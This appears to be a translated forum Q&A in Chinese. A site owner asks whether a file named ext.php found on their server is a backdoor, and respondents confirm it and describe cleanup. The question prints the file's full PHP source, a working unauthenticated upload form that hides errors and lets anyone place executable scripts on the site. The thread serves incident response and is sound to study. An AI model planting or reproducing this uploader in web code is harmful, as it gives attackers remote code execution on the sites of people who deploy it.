这个ext.php是后门脚本吗？

我在查看我的一个站点的服务器时，注意到一个我不认识的文件（可能是过去在服务器上工作的其他人上传的）

该文件是一个名为

ext.php

的php文件，包含一个上传文件的表单

<?php 
error_reporting(0);
@ini_set("display_errors", 0);
$var= $_SERVER['PHP_SELF']."?";
$form ='<form enctype="multipart/form-data" action="'.$var.'" method="POST"><input name="uploadFile" type="file"/><br/><input type="submit" value="Upload" /></form>';
if (!empty($_FILES['uploadFile'])) {
$self=dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);
$time=filemtime($self);print "OK";
} else { print $form; } ?>

---

是的，任何人都可以将“somescritpt.php”上传到您的站点中，并将以站点的权限使用其中的任何代码执行。所以这是后门。
即使回答了这个问题，下面是我创建的代码，用于清除多站点服务器上的后门恶意软件。即使有一些备份，也有太多1000个带有垃圾代码的文件，值得编写一个更干净的脚本

请查看GitHub了解更多信息

这不是包含代码的完整答案，因为它跨越多个文件。如果你深入研究它的工作原理（很快），它可以省去很多麻烦，你可以成为当年的英雄，在几分钟内恢复坏服务器。
这样认为。我还注意到上传了一些新文件（即，如果有filename.php，也有filenamex.php）。我不确定他们是否复制了任何文件。。。因此，我目前正在删除服务器上的所有内容，并上载我在文件中的备份站点。。。